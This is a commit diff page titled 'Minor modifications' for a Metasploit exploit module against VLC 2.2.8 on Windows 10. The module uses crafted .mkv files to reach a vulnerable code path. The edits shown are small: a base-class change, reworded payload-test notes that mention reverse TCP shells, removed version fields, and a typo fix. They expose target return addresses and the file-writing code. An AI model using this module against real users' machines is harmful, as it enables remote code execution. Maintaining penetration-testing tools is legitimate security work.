Minor modifications
parent
796579e265
commit
50a7ee5e6a
|
@ -3,7 +3,7 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
class MetasploitModule < Msf::Exploit
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
the second .mkv file is required in order to take the vulnerable code
|
||||
path and should be placed under the same directory as the .mkv file.
|
||||
|
||||
Tested to work with windows/exec, windows/x64/exec, windows/shell/reverse_tcp,
|
||||
This module has been tested against VLC v2.2.8. Tested with payloads
|
||||
windows/exec, windows/x64/exec, windows/shell/reverse_tcp,
|
||||
windows/x64/shell/reverse_tcp. Meterpreter payloads if used can
|
||||
cause the application to crash instead.
|
||||
),
|
||||
|
@ -46,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[
|
||||
'VLC 2.2.8 on Windows 10 x86',
|
||||
{
|
||||
'Version' => '2.2.8',
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86],
|
||||
'Ret' => 0x22000020,
|
||||
|
@ -81,7 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[
|
||||
'VLC 2.2.8 on Windows 10 x64',
|
||||
{
|
||||
'Version' => '2.2.8',
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X64],
|
||||
'Ret' => 0x40000040,
|
||||
|
@ -298,7 +297,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
File.open(full_path, 'ab') do |fd|
|
||||
count.times { fd.write(simple_block) }
|
||||
end
|
||||
print_good("Succesfuly appended blocks to #{f1}")
|
||||
print_good("Succesfully appended blocks to #{f1}")
|
||||
end
|
||||
|
||||
def file_format_filename(name = '')
|
||||
|
|
Loading…
Reference in New Issue